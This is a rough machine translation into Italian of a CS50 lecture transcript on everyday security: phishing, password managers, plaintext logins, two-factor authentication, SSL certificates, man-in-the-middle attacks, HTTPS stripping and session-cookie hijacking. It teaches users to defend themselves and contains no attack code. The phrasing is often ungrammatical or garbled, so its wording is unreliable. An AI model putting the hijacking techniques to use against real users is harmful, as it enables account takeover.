DAVID J. MALAN: Questo è CS50, e questo è l'inizio della Settimana 10. Si può ricordare che abbiamo mostrato sullo schermo una stampante 3D, che è questo dispositivo che prende bobine di plastica e poi si estrude riscaldandolo e fusione in modo che possiamo poi formare l'esercito di Chang di elefanti, per esempio. 

Così a Leverett House, però, di recente, ho è stato chiacchierando con uno dei vostri compagni di classe e amico di Chang di nome Michelle, che effettivamente internato a questa altra società lo scorso anno che ha una tecnica diversa per realtà creazione di oggetti tridimensionali, come questo piccolo elefantino qui. In particolare, il modo in cui funziona è che si tratta di un esempio di qualcosa denominata stereolitografia, in base al quale c'è questo bacino di resina o liquidi, e poi un laser colpisce che liquidi, e gradualmente, il dispositivo ascensori e montacarichi e ascensori la cosa che si stampa, come un elefante, come quel liquido diventa solido. E il risultato, in realtà, è qualcosa che è molto più robusto rispetto ad alcune delle la plastica omaggi alcuni di voi avrebbe potuto avere. 

E che Chang gentilmente ha fatto per noi qui è stato ha fatto un time-lapse utilizzando fotografie nel corso di un'ora o più, probabilmente, per la produzione di questo ragazzo qui. Qualcuno che non ha mai venire prima piacerebbe venire colpito Inizio questo video? Lasciami andare con, che ne dite di lì. Andiamo su. Bene. E tu sei? LUKE: Mi chiamo Luca [incomprensibile]. DAVID J. MALAN: Ciao, Luca. Piacere di conoscerti. 

LUKE: Piacere di conoscerti. PUBBLICO: Egli è in esecuzione per UC. 

DAVID J. MALAN: Lo so, stiamo cercando di non promuovere. Va bene, così Luca, tutto quello che dovete fare qui in CS50 è premere la barra spaziatrice per stampare questo elefante. [RIPRODUZIONE VIDEO] - [Ronzio MACHINE] - [CRASH] - [BOOM] - [CRASH] [FINE RIPRODUZIONE VIDEO] DAVID J. MALAN: In modo che è esattamente cosa vuol dire per la stampa 3D. E qui è il tuo elefante. Grazie per il volontariato. Bene. Così ancora una volta, per la specifica per il progetto definitivo, l'hardware che è disponibile a voi ragazzi è, per qualche motivo, il progetto ha qualche intersezione di software e hardware, si rendono conto che queste sono ora le risorse. 

Volevo prendere un momento di toccare su un articolo Crimson che è venuto fuori tardi di ieri sera, che era quello di annunciare che questo tizio qui, David Johnson, che è stato il più anziano Precettore per Ec 10 per un bel po 'di tempo, sta lasciando Harvard al fine dell'anno accademico. E volevo solo prendere un momento, onestamente, ringraziare Davide di fronte a CS50. E 'stato un mentore di specie a noi nel corso degli anni. 

E mi sento come noi, CS50, hanno piuttosto cresciuto con Ec 10 qui, dal momento che sono proprio davanti a noi. E lui e tutta la squadra in Ec 10 ha stato meravigliosamente gentile, francamente, come abbiamo Lug in tutte le nostre attrezzature ogni settimana, e anni fa, fornito una grande quantità di consiglio come eravamo curioso di sapere come funzionano Ec 10. Così i nostri ringraziamenti e ammirazione per David Johnson. 

[Applausi] 

Ora, unrelatedly, in modo da la fine è davvero vicina. Siamo qui in settimana 10. E abbiamo solo un semplice paio di settimane formali qui in classe a sinistra, seguita da un paio di eventi. Quindi, per dare un senso di ciò che è all'orizzonte, eccoci qui oggi. 

Questo Mercoledì, richiamo, avremo una conferenza ospite nientemeno che Proprio Steve Ballmer di Microsoft. Se non sei ancora andato a cs50.harvard.edu/register, farlo, dal momento che lo spazio sarà limitato. E saranno controllando ID alla porta questo giorno. Se tu non fossi qui la scorsa settimana, ho pensato di si prendono in giro con un look diverso a Steve e l'eccitazione che ci attende il Mercoledì. 

[RIPRODUZIONE VIDEO] 

-Passion. 

-We're Sta per essere Hardcore hardcore--. 

-Innovator. 

-Bill Ha detto, non si ottiene. Stiamo per mettere un computer su ogni scrivania e in ogni casa, che divenne il motto per l'azienda. Giuro, Bill ha inventato quella notte di darmi veramente parte della visione di perché dovrei dire di sì. Non ho mai guardato indietro, davvero, dopo. 

-fresco Il college, ha unito un avvio alle prime armi e permesso di passare in uno di America la maggior parte delle aziende di successo di sempre. La vita e le imprese lezioni apprese lungo il percorso lo lasciò di nuovo al suo passione l'infanzia e l'amore. E queste esperienze hanno preparato lui per la sua prossima sfida nella vita. 

-Niente Ottiene nel nostro braccio way--! Continuano ad arrivare hardcore! Vai Clippers! 

-Questo È Steve Ballmer, "In My Own Words". [FINE RIPRODUZIONE VIDEO] DAVID J. MALAN: --Questo Mercoledì a CS50. Andate di nuovo a questo URL qui. Per quanto riguarda ciò che il resto è all'orizzonte, la prossima settimana, senza conferenza il Lunedi. Ma ci sarà successivo a quello da un quiz il Mercoledì. Vai alla homepage di CS50 per i dettagli su persone, luoghi e tempi per tutti i vari proctoring logistica e simili, nonché sui recensione sessioni che sono imminente. E poi, infine, il Lunedi, il giorno prima della settimana di pausa del Ringraziamento, rendo conto che sarà la nostra ultima lezione. Ci servirà torta e un grande quantità di eccitazione, speriamo. 

Ora, un paio di altri aggiornamenti. Tenete a mente che lo stato rapporto, che è in realtà solo vuole essere un'interazione casuale con la vostra carta di TF di affermare con orgoglio solo fino a che punto con il vostro progetto definitivo si è, o almeno come sanità verificare che si dovrebbe si avvicini a quella punto poco dopo. L'Hackathon deriva che. Realizzare il Hackathon Non è un'opportunità per avviare il progetto finale, ma vuole essere un'opportunità di essere in mezzo o verso Alla fine del progetto finale, all'attuazione dovuta pochi giorni dopo, seguita dalla fiera CS50. 

Ora, la produzione di CS50 squadra, un paio di anni fa, mettere insieme un teaser per la fiera CS50 che abbiamo abbiamo pensato di mostrarvi oggi, perché sono stati al lavoro su un prequel per questo, un nuovo video che saremo concludere oggi con. Ma ecco cosa vi aspetta per CS50 fiera di quest'anno. [RIPRODUZIONE VIDEO] - [CELL telefono che squilla] [MUSIC "TEMA DA MISSION: IMPOSSIBLE"] [FINE RIPRODUZIONE VIDEO] DAVID J. MALAN: In modo che è esattamente come chiudiamo osservazioni finali del progetto. Un paio di ora teasers-- se vuoi entrare Nick qui per il pranzo, come al solito, questo Venerdì, testa a questo URL qui. Inoltre, se si desidera di aderire Nick o questo Nick o questo Allison o qualsiasi i membri della squadra di CS50, si rendono conto che, a breve dopo la fine del periodo, CS50 sarà già reclutando per la squadra del prossimo anno, per CA, TF, progettisti, produttori, ricercatori, e altre posizioni che qui operano CS50 sia in davanti e dietro le quinte. Quindi, se questo potrebbe essere di interesse a voi, andare a questo URL qui. E gli studenti più confortevoli, meno confortevole, e da qualche parte in tra simili sono tutti i benvenuti e incoraggiati ad applicare. 

Così è stato un tempismo perfetto che, non scherzo, questa mattina, quando mi sono svegliato, Ho avuto questo qui spam nella mia casella di posta. In realtà scivolato attraverso il filtro anti-spam di Gmail in qualche modo e finito nella mia casella di posta reale. E dice: "Caro casella di posta utente, al momento sei aggiornato a 4 gigabyte di spazio. Si prega di accedere al tuo account al fine di convalidare E-spazio ". 

E poi c'è questo bel blu Link seducente lì per fare clic su per docenti e personale, che poi mi ha portato ad una pagina meravigliosamente legittimo, che mi ha chiesto di dare loro il mio nome e l'indirizzo e-mail e, naturalmente, password per convalidare chi sono e così via. Ma naturalmente, come è sempre il caso, si arriva a questa pagina di destinazione, e, naturalmente, c'è almeno un errore di battitura, che sembra essere il chiodo la bara di una di queste truffe. E postiamo, forse, qualche altro link a questo tipo di schermate in futuro. Ma si spera, la maggior parte delle persone in questa stanza non sono clicked-- o anche se hai fatto clic tali collegamenti come questo, non si è spinto fino a compilare i moduli e così via. In realtà, è OK se avete. Cercheremo di rimediare oggi, perché, infatti, la conversazione di oggi è sulla sicurezza. 

Ed in effetti, una delle obiettivi di CS50 non è tanto per insegnarvi CE o PHP o JavaScript o SQL o qualsiasi di queste sottostante dettagli di implementazione. Ma è per permetterti come esseri umani per fare solo le decisioni più intelligenti come esso si riferisce alla tecnologia premuto il strada in modo che, se sei un ingegnere o umanista o scienziato o qualsiasi altro ruolo, si stanno facendo scelte consapevoli circa il proprio utilizzo di calcolo, o se siete in un decisionale posizione, in politica, in particolare, si sta facendo molto, decisioni molto meglio di un sacco di esseri umani di oggi sono stati. E noi faremo questo modo di alcuni esempi. 

In primo luogo, sono rimasto piuttosto sorpreso recentemente per scoprire quanto segue. Quindi password, ovviamente, sono ciò che la maggior parte di noi utilizzare per proteggere la nostra e-mail data--, chattare, e tutti i tipi di risorse del genere. E proprio da un awkward-- non mostrano di mani, ma sguardi imbarazzati di vergogna, quanti di voi usano la stessa password in un sacco di siti web? 

Oh, OK, quindi faremo le mani. OK, quindi molti di voi fanno. Chi fa questo, proprio per questo? E che cosa? Sì? PUBBLICO: E 'facile da ricordare, perché non dovete ricordare [incomprensibile]. DAVID J. MALAN: Sì, è facile da ricordare. E 'perfettamente ragionevole, comportamento razionale, anche se il rischio stai mettendo te stesso in questi casi è solo uno o più di tali siti web è vulnerabile ad hacking o di insicuro o la password è solo così maledettamente da indovinare, chiunque può capirlo. Non solo è un conto compromessa, ma in teoria, qualsiasi conti che sono stati su internet. Quindi so che potrei dire oggi, non lo faccio utilizzare la stessa password ovunque, ma che è molto più facile a dirsi che a farsi. Ma esistono tecniche per mitigare quel particolare preoccupazione. 

Ora, mi è capitato, per esempio, a utilizzare un programma chiamato 1Password. Un altro popolare si chiama LastPass. E un gruppo di CS50 uso personale uno o più di questi tipi di strumenti. E per farla breve, una da asporto per oggi dovrebbe essere, sì, si potrebbe avere la stessa password ovunque, ma è molto facile da fare non è più quello. Per esempio, in questi giorni, so forse una delle mie decine o centinaia delle password. Tutte le mie altre password sono pseudo-casuale generato da uno di questi programmi qui. E in poche parole, e anche se la maggior parte di questi programmi tendono a venire con un po 'di un costo, si dovrebbe installare un programma come questo, si sarebbe poi memorizzare tutti i vostri nomi utente e password all'interno di questo programma il vostro Mac o PC o roba del genere, e allora sarebbe crittografato sul computer con ciò che è si spera, un particolarmente lungo password. Così ho un sacco di le password per i singoli siti web, e poi ho una davvero password lunga che ho utilizzare per sbloccare tutti le altre password. E che cosa c'è di bello software di questo tipo è che, quando si visita un sito web che è chiedere il vostro nome utente e password, in questi giorni, non mi digitano il mio nome utente e la password, perché, ancora una volta, io non so nemmeno ciò che la maggior parte delle mie password sono. Mi ha colpito invece una tastiera collegamento, il cui risultato è quello di innescare questo software per Mi chiede la password principale. Poi si scrive che una grande password, e poi il browser riempie automaticamente ciò che la mia password è. Quindi, veramente, se si prende niente altro lontano da oggi in termini di password, si tratta di un software che vale la pena download o investire in modo che si può almeno rottura quella particolare abitudine. E se siete il tipo che è con Post-It o l'like-- e le probabilità sono almeno uno di voi è-- che l'abitudine, anche, è sufficiente dire, dovrebbe essere rotto. 

Ora, mi è capitato di scoprire, di conseguenza di utilizzare il software, il seguente. Stavo ordinando un accordo commestibile, questo cesto di frutta, di recente. E mi ha colpito la mia tastiera speciale scorciatoia per accedere al sito. E il software ha innescato un pop-up che ha detto, sei sicuro vuoi che automaticamente inviare questo username e password? Poiché la connessione è insicuro. 

Il collegamento non è utilizzando HTTPS, per la sicurezza, utilizzando tale protocollo noto come SSL, Secure Sockets Layer. E in effetti, se si guarda al in alto a sinistra di questo sito, è solo www.ediblearrangements.com, non HTTPS, che non è così buono. 

Ora, io ero curious-- forse questo è solo un bug nel software. Sicuramente, qualche sito come questo che molti di noi sa di è almeno utilizzando la crittografia o HTTPS per l'accesso. Così ho preso un po 'curioso di questa mattina. E ho avuto le mie competenze CS50, Ho aperto Chrome ispettore. Non è nemmeno più di una abilità. E 'appena colpito la tastiera destra scorciatoia per aprire questo. Ed ecco una grande finestra dell'ispettore di Chrome. 

Ma quello che era in realtà un poco tragica e ridicola erano queste due righe qui. Su in alto, notare l'URL che il mio nome utente e la password sono state presentate. Lasciatemi Zoom avanti. E 'stato questo qui. E tutto questo è sorta di interessante, tranne per la cosa fino a sinistra, che inizia con http: //. E così poi, OK, forse sono solo invio il mio nome utente, che è non come un grosso problema. Forse la mia password viene inviata in seguito. Sarebbe una specie di decisione interessante design. 

Ma no. Se poi guardate la richiesta carico utile, il nome utente e la password I sent-- e ho preso in giro questi per la slide-- sono stati effettivamente inviati in chiaro. Così si va a questo particolare sito web e ordinare un accordo commestibili del genere, anzi, evidentemente, per tutto questo volta che sono stato ordinate da loro, il nome utente e la password sta andando tutto in chiaro. Quindi, onestamente, questo è del tutto inaccettabile. Ed è così banale per evitare le cose in questo modo come il progettista di un sito web e come il programmatore di un sito web. 

Ma l'asporto qui per noi come utenti di siti web è solo apprezzare che tutti quello che serve è per un disegno stupido decisione, decisione di progettazione ingiustificabile, così che ora, se si conosce la password è "Cremisi" su questo sito web, probabilmente avete appena entrato in un sacco di altri siti che ora ho. E non c'è molto di una difesa contro tale diverso da quello che Chang ha fatto questa mattina. Andò a Edible Arrangements, che si trova in fondo alla strada a Cambridge, e fisicamente comprato questo per noi. E 'stato molto più sicuro di Usando il sito in questo caso. 

Ma il particolare da tenere d'occhio è in realtà ciò che è nella parte superiore del browser su Là. Ma anche questo può essere un po 'ingannevole. Così un altro interessante esempio e il modo di difendere contro questo-- e in realtà, cerchiamo di do che first-- il modo di difendere contro questa è una tecnica che gli uomini della sicurezza avrebbero chiamare autenticazione a due fattori. 

Qualcuno sa che la soluzione a problemi di questo tipo significa? Che cosa è l'autenticazione a due fattori? Oppure, per dirla in altro modo, come molti di voi lo usano? OK, quindi un paio di persone timide. Ma sì. Ho visto la tua mano salire. Che cosa è l'autenticazione a due fattori? 

PUBBLICO: Fondamentalmente, oltre per digitare la password, hai anche una secondaria [incomprensibile] inviato tramite messaggio di testo sul telefono al [incomprensibile]. DAVID J. MALAN: Esattamente. Oltre a qualche forma primaria di autenticazione, come una password, verrà chiesta una secondaria fattore, che è tipicamente qualcosa che hai fisicamente su di voi, anche se può essere qualcosa di completamente diverso. E che cosa è in genere un cellulare in questi giorni per cui si ottiene inviato un messaggio di testo temporaneo che dice "Il tuo codice di accesso temporaneo è 12345." 

Quindi, oltre al mio password "cremisi", ho anche necessario digitare in qualsiasi il sito mi ha mandato un messaggio. Oppure, se si dispone di questo con un bancario o un conto di investimento, a volte hai questi piccoli dongle che in realtà hanno una pseudo-casuale generatore di numeri integrato al loro interno, ma sia il dispositivo e la banca sapere che cosa il vostro seme iniziale è in modo che sappiano, anche se il po 'di codice sul vostro piccolo portachiavi marciando avanti ogni minuto o due, cambiamento dei valori, così fa che il cambiamento del valore sul server della banca in modo che possano similmente autenticazione si, non solo con la tua password, ma con quel codice temporaneo. Ora, si può effettivamente fare questo in Google. E, francamente, questo è un buona abitudine di entrare in, soprattutto se si sta utilizzando Gmail per tutto il tempo su un browser. Se andate a questo URL qui, che è in le diapositive in linea per oggi, e poi clicca su 2-fase di verifica, stessa cosa reale lì. Ti verrà chiesto di dare loro il tuo numero di cellulare. E poi, ogni volta che si accede Gmail, ti verrà chiesto non solo la password, ma anche per un po 'di codice che viene inviato al tuo telefono temporaneamente. E fino a quando i cookie sono attivati, e così a lungo come si fa non esplicitamente logout, dovrai solo farlo di tanto in tanto, come quando ci si siede a un nuovo computer. 

E la testa, anche qui, è, se si sedersi ad un certo stile cafè internet computer o solo computer di un amico, anche se quell'amico maliziosamente o inconsapevolmente ha qualche logger di tastiera installato sul proprio computer, in modo tale che tutto ciò che si tipo è in corso la registrazione, almeno questo secondo fattore, che codice provvisorio, è effimera. Quindi lui o lei o chi è compromesso il computer non può accedere successivamente si, anche se tutto il resto era vulnerabile o addirittura in chiaro del tutto. Facebook ha anche questo, con tale URL qui, dove è possibile fare clic su Login Approvazioni. Quindi anche qui, se non vogliono gli amici a colpire le persone, non si vuole essere frugando su Facebook o la pubblicazione di aggiornamenti di stato per te, autenticazione a due fattori qui è probabilmente una buona cosa. E poi c'è questa altra tecnica complessivamente, solo auditing, che è anche una buona cosa per noi esseri umani, se a due fattori risulta fastidioso, che, è vero, si può, o non è solo disponibile su qualche sito, in minima tenere d'occhio se e quando si sta accedendo all'interno di siti o, se permettete, è una buona tecnica, anche. Così Facebook ti dà anche questo le notifiche di accesso dispongono, in base al quale in qualsiasi momento si rende conto di Facebook, hm, David ha effettuato l'accesso da parte di alcuni computer o telefono che non abbiamo mai visto prima da un indirizzo IP che sembra non familiare, faranno almeno si scriva una e-mail a qualsiasi indirizzo e-mail avete in archivio, dicendo: fa questo aspetto sospetto? In tal caso, cambiare immediatamente la password. E così anche lì, solo il comportamento di revisione anche dopo che sei stato compromessa, può almeno restringere la finestra durante che siete vulnerabili. 

D'accordo, tutte le domande su quella roba finora? Oggi è il giorno per ottenere tutti la tua paranoia ha confermato o negato. Questo è in gran parte confermato, purtroppo. Sì? 

PUBBLICO: [incomprensibile] telefono, E se le vostre pause di telefono, e poi è sempre difficile da verify-- 

DAVID J. MALAN: Vero. 

PUBBLICO: Oppure, se sei in un altro paese, e che non consentono di colleghi perché [incomprensibile]. DAVID J. MALAN: Assolutamente. E così queste sono le ulteriori costi che si incorrere. C'è sempre questo tema di un trade-off, dopo tutto. E poi, se si perde il telefono, se si rompe, se sei all'estero, o semplicemente non si dispone di un del segnale, come un 3G o un segnale LTE, non si potrebbe in realtà essere in grado di eseguire l'autenticazione. 

Quindi, di nuovo, questi due sono compromessi. E a volte, può creare un sacco di lavoro per voi come un risultato. Ma in realtà dipende, poi, il ciò che il prezzo previsto per voi è qualcosa di essere compromessa del tutto. 

Così SSL, allora, è questa tecnica che tutti noi in genere diamo per scontato o assumere è lì, anche se questo non è chiaramente il caso. E si può ancora trarre in inganno persone, però, anche con questo. Quindi, ecco un esempio di una banca. 

Si tratta di Bank of America. C'è un sacco di questi in Harvard Square e oltre. E notare che, al vertice di lo schermo, c'è un, anzi, HTTPS. Ed è anche verde e ha sottolineato per noi per indicare che questo è davvero un sito web legittimamente sicuro, o almeno così siamo stati addestrati a credere. 

Ora, oltre a questo, però, notare che, se focalizziamo l'attenzione, c'è questa cosa qui, dove viene richiesto il login. Cosa significa il lucchetto a destra lì, accanto al mio nome utente chiede conferma? Questo è abbastanza comune sui siti web, anche. Che cosa significa questo lucchetto significa? Sembri come si sa. 

PUBBLICO: Non significa niente. 

DAVID J. MALAN: Si non significa nulla. Ciò significa che Bank of America sa come di scrivere HTML con tag immagine, giusto? Significa veramente nulla, perché anche che, utilizzando il primo giorno del nostro sguardo in HTML, in grado di codificare una pagina con uno sfondo rosso e un'immagine, come un GIF o roba del genere, che succede a guardare come un lucchetto. Eppure, questo è super comuni nei siti web, perché siamo stati addestrati ad assumere che, oh, lucchetto significa sicuro, quando in realtà significa solo sai HTML. 

Ad esempio, nel giorno, ho potuto hanno appena messo questo sul mio sito, sostenendo che è sicuro, e chiedendo, in modo efficace, per i nomi utente e le password delle persone. Quindi, guardando l'URL è almeno un indizio migliore, Perché questo è integrato in Chrome o qualunque browser che stai utilizzando. Ma anche allora, a volte le cose possono andare male. E infatti, non si potrebbe sempre vedi HTTPS, figuriamoci in verde. 

Qualcuno di voi ha mai visto una schermata come questa? Potrebbe essere, in realtà, in precedenza nel mese di ottobre, quando ho dimenticato di pagare per il nostro Certificato SSL, come si chiama, e stavamo cercando come questo per una o due ore. Quindi, probabilmente avete visto cose in questo modo, con uno sciopero-through, come una linea rossa, attraverso il protocollo nella URL o qualche tipo di schermo che è almeno si ammonendo per aver tentato di procedere ulteriormente. E Google qui è invitante di tornare alla sicurezza. 

Ora, in questo caso, questo solo significato che il certificato SSL che stavamo usando, i grandi, numeri matematicamente utili che sono associati con il server di CS50, non erano più validi. E infatti, siamo in grado di simulare questo, come si può sul vostro computer portatile. Se vado in Chrome qui, e andiamo a facebook.com, e sembra che questo è sicuro. Ma mi permetta di andare avanti ora e fare clic sul lucchetto qui. 

E lasciami andare a Connection, Informazioni sul certificato. E in effetti, quello che ti vediamo qui è un po ' di dettagli di basso livello su facebook.com che è in realtà. Sembra di aver pagato i soldi per una società denominata forse DigiCert alta Garanzia che ha promesso a dire il resto del mondo che, se un browser vede sempre un certificate-- si può pensare di esso letteralmente come un certificato che sembra che la cosa di formaggio in cima sinistra- sotto poi facebook.com è chi dice di sono, perché tutto questo tempo, quando si visita un sito web, come cs50.harvard.edu o facebook.com o gmail.com che utilizzano HTTPS URL, dietro le quinte, c'è questo tipo di operazione succede automaticamente per voi, in base al quale facebook.com, in questo caso, è l'invio al vostro browser la sua cosiddetto certificato SSL, o meglio, la sua chiave pubblica, e allora il tuo browser sta usando la chiave pubblica inviare successivamente cifrata traffico da e per esso. 

Ma c'è tutta questa gerarchia nel mondo delle aziende che si paga il denaro a chi lo farà poi testimoniare, in senso digitale, che tu sia effettivamente facebook.com o il server è davvero cs50.harvard.edu. E integrato nel browser, come Chrome e IE e Firefox, è un elenco di tutti quelli cosiddette autorità di certificazione che sono autorizzati dalla Microsoft e Google e Mozilla per confermare o negare che facebook.com è chi dice di essere. Ma il problema è che queste cose scadono. In realtà, sembra di Facebook scade il prossimo ottobre, nel 2015. 

Così possiamo effettivamente simulare questo se andare nel mio Mac ai miei Preferenze di Sistema, e vado in data e ora, e Vado in data e ora qui, e Apro questo qui-- per fortuna, Non ci ha rivelato una password questo tempo-- e ora vado giù a deselezionare questa. E cerchiamo di actually-- oops, questo è non così interessante come fare questo. Siamo letteralmente in futuro ora, che significa che questo è ciò che 2020 è come. Se ora ricarichiamo la page-- facciamolo in Ingognito mode-- se ricarico la pagina, non ci andiamo. 

Così ora, il mio computer pensa è il 2020, ma il browser sa che questo certificato da Facebook scade, ovviamente, nel 2015. Quindi mi sta dando questo messaggio in rosso. Ora, per fortuna, i browser come Chrome hanno in realtà reso piuttosto difficile da procedere comunque. Essi infatti mi vogliono per andare verso la salvezza. 

Se clicco qui su Advance, è intenzione di dirmi qualche dettaglio in più. E se voglio davvero di procedere, si lasceranno andare a facebook.com, che è, nuovo, pericoloso, a questo punto Ci vediamo l'homepage di Facebook, come questo. Ma poi l'altro sembrano essere di rottura. Che cosa è probabilmente la rottura, a questo punto? PUBBLICO: JavaScript. DAVID J. MALAN: Come il Javascript e / o CSS file sono allo stesso modo incontrare questo errore. Quindi questa è solo una brutta situazione complessiva. Ma il punto è che almeno Facebook ha effettivamente attivato SSL per i loro server, come molti siti web, fare, ma non necessariamente tutti. 

Ma non è solo il cibo da asporto qui. Si scopre che anche SSL è stato dimostrato essere insicuro in qualche modo. Così sto tipo di accennare che SSL, bene. Cercare HTTPS URL, e la vita è bene, perché tutto il traffico HTTP e le intestazioni e il contenuto è crittografato. 

Nessuno può intercettare nel mezzo, ad eccezione di un cosiddetto uomo nel mezzo. Si tratta di una tecnica generale nel mondo della sicurezza conosciuto come un attacco man-in-the-middle. Supponiamo che sei questo piccolo computer portatile qui a sinistra, e supponiamo che si sta cercando di visitare un server là sulla destra, come facebook.com. 

Ma supponiamo che, tra l'utente e Facebook, è un sacco di altri server e attrezzature, come switch e router, Server DNS, server DHCP, nessuno dei quali abbiamo il controllo. Potrebbe essere controllata da Starbucks o Harvard o Comcast o simili. Bene, supponiamo che qualcuno maliziosamente, sulla rete, tra voi e Facebook, è in grado di dirvi che, si sa che cosa, l'indirizzo IP del Facebook non è quello che si pensa che è. E 'questo IP. 

E così il browser è indotti a richiesta il traffico proveniente da un'altra computer di tutto. Bene, supponiamo che di computer guarda semplicemente a tutti del traffico si sta richiedendo da Facebook e tutte le pagine web che si sta richiedendo da Facebook. E ogni volta che vede nel vostro traffico un URL che inizia con HTTPS, dinamicamente, sulla volare, riscrive come HTTP. E ogni volta che vede una posizione intestazione, la posizione del colon, come si usa per reindirizzare l'utente, anche quelle, può essere modificato da quest'uomo in mezzo da HTTPS a HTTP. 

Quindi, anche se lei stesso potrebbe pensi di essere al vero e proprio Facebook, non è così difficile per un avversario con accesso fisico alla rete semplicemente ritorno pagine a voi che guardare come Gmail, che guardare come Facebook, e in effetti l'URL è identico, perché sono fingendo di avere lo stesso nome host a causa di qualche sfruttamento di DNS o qualche altro sistema simile. E il risultato, poi, è che noi esseri umani solo potrebbe rendersi conto che, OK, questo sembra Gmail o almeno la versione precedente, come è questa diapositiva da una presentazione più vecchio. Ma sembra che questo-- http://www.google.com. 

Quindi anche qui, la realtà è che come molti di voi, quando si va su Facebook o Gmail o qualsiasi sito web e si conosce un po 'di qualcosa su SSL, quanti di voi fisicamente digitare https: // e poi il sito web Nome, immettere. La maggior parte di noi solo digitare, come, CS50, premere Invio, o F-A per Facebook e premere Invio, e lasciare che si auto-completa. Ma dietro le quinte, se si guarda il traffico HTTP, probabilmente c'è un sacco di queste intestazioni di localizzazione che si sta inviando da Facebook a www.facebook.com a https://www.facebook.com. 

Ecco, questo è uno o più transazioni HTTP dove le tue informazioni sono completamente inviato in chiaro, non crittografia di sorta. Ora, che potrebbe non essere così grande che fare se tutto quello che sta cercando di fare è accedere alla home page, non si è l'invio di username e password. Ma che cosa è sotto la cappa, in particolare per i siti web basati su PHP, che è anche inviati avanti e indietro quando si visita qualche pagina web se che usi di siti web, per esempio, PHP e implementa funzionalità come pset7? Quello che era stato mandato avanti e indietro nelle intestazioni HTTP che ti ha dato l'accesso a questa bella utile super-globale in PHP? 

PUBBLICO: Biscotti. 

DAVID J. MALAN: Cookies, in particolare il PHP sess ID dei cookie. Quindi ricorda, se andiamo a, per esempio, cs50.harvard.edu di nuovo, ma questa volta, apriamo il Scheda di rete, e ora, qui, facciamo letteralmente basta andare a http://cs50.harvard.edu e poi premere Invio. E poi guardare lo schermo verso il basso qui. Notate che abbiamo effettivamente ottenuto di nuovo un 301 trasferite a titolo permanente messaggio che indica che c'è un colpo di testa posizione qui, che ora mi reindirizzamento a HTTPS. 

Ma il problema è che, se ho già avuto un cookie impresso sulla mia mano virtualmente, come abbiamo discusso prima, e Io il genere umano senza saperlo basta visitare il insicuro versione, e il mio browser lo prende su se stesso per dimostrare che il timbro di mano per la prima richiesta, che è via HTTP, qualsiasi uomo nel mezzo, qualsiasi avversario nel mezzo, può teoricamente solo vedere queste intestazioni HTTP, solo come stiamo guardando qui. E 'solo una volta che sei parlando con un HTTPS URL non che il timbro mano stessa arrivare crittografato, a la Cesare o Vigenere, ma con un algoritmo più elaborato del tutto. Quindi anche qui, anche se siti web utilizzano HTTPS, noi esseri umani sono stati condizionati, grazie alle tecniche di completamento automatico e le altre, a nemmeno pensare le potenziali implicazioni. Ora, ci sono modi per aggirare questo. Per esempio, molti siti web possono essere configurati in modo che, una volta che hai questa mano timbro, è possibile indicare al browser, questo francobollo mano è solo per le connessioni SSL. Il browser non dovrebbe presentare a me meno che non sia su SSL. Ma molti siti web non perdete tempo con questo. E a quanto pare molti siti web non si preoccupano neppure con SSL a tutti. 

Così, per di più su questo, c'è in realtà ancora più sporco in questa presentazione che un collega ha dato a un cosiddetto nero cappello conferenza un paio di anni fa, dove c'è anche altro trucchi maligni persone hanno utilizzato. Si potrebbe ricordare questo nozione di una favicon, che è come un piccolo logo che è spesso nella finestra del browser. Beh, quello che è stato comune tra i cattivi è per rendere le icone fab che sembrano cosa? PUBBLICO: [incomprensibile]. DAVID J. MALAN: dire ancora? PUBBLICO: I siti. DAVID J. MALAN: Non un sito web. Così favicon, piccola piccola icona. Quale sarebbe il più dannoso, cosa manipolativa si potrebbe rendere il vostro sito web icona di default simile? PUBBLICO: Un blocco verde. DAVID J. MALAN: Che cos'è? PUBBLICO: Un po 'di blocco verde. DAVID J. MALAN: Come un blocco verde, esattamente. Così si può avere questa estetica di un lucchetto verde, alludendo al mondo, oh, siamo sicuro, quando, ancora una volta, tutto ciò che significa è che si sa un po 'di HTML. Così dirottamento di sessione si riferisce a esattamente questo. Se hai qualcuno che è tipo di annusando le onde radio in questa stanza qui o ha accesso fisico a un rete e può vedere i cookie, lui o lei può afferrare che PHP sess ID dei cookie. E poi, se sono abbastanza esperto da sapere come inviare il cookie come proprio timbro mano solo copiando quel valore e inviare le intestazioni HTTP, qualcuno potrebbe molto facilmente accedere a qualsiasi di Facebook conti o gli account Gmail o account Twitter che sono qui, aperti nella stanza, se non si sta usando SSL e se il sito è Non utilizzando SSL correttamente. 

Quindi andiamo transizione verso un'altra. Così un'altra storia vera. E questo appena rotto in notizie di una settimana o due fa. Verizon ha fatto una cosa molto male, e come persone migliori possono dire, almeno dal 2012, per cui, quando si accede a siti web tramite Verizon cellulare, qualunque produttore è, sono stati presuntuosamente, come dice la storia, iniettare in tutti i tuoi HTTP traffico la propria intestazione HTTP. E che guarda intestazione come questo-- X-UIDH. UID è come un unico identificativo o ID utente. E X significa semplicemente si tratta di una consuetudine header che non è standard. 

Ma cosa significa questo è che, se mi tiro su, ad esempio, qualsiasi sito sul mio qui-- telefono e sto usando Verizon come il mio carrier-- anche se il mio navigatore non potrebbe essere l'invio di questa HTTP intestazione, Verizon, il più presto come il segnale raggiunge la cellulare torre da qualche parte, è stato per qualche tempo l'iniezione di questo intestazione in tutto il nostro traffico HTTP. Perché lo fanno? Presumibilmente per ragioni di monitoraggio, per motivi pubblicitari. 

Ma la decisione di progettazione idiota qui è che un header HTTP, come voi ragazzi sapete da pset6, viene ricevuto da qualsiasi web server che si sta richiedendo traffico. Quindi tutto questo tempo, se sei stato in visita Facebook o Gmail o qualsiasi sito web che non utilizza SSL tutte le tempo-- e in realtà, quelli due per fortuna ora fare-- ma per altri siti web non utilizzare SSL per tutto il tempo, Verizon ha essenzialmente stato piantare, con la forza, un timbro mano su tutta la nostra mani che anche noi non vediamo, ma piuttosto, le estremità siti fanno. E così non è stato che difficile per chiunque su Internet esecuzione di un server Web per realizzare, ooh, questo è David, o, ooh, questo è Davin, anche se siamo rigorosa sulla cancellazione nostri cookie, perché non proviene da noi. E 'venuta da parte del vettore. 

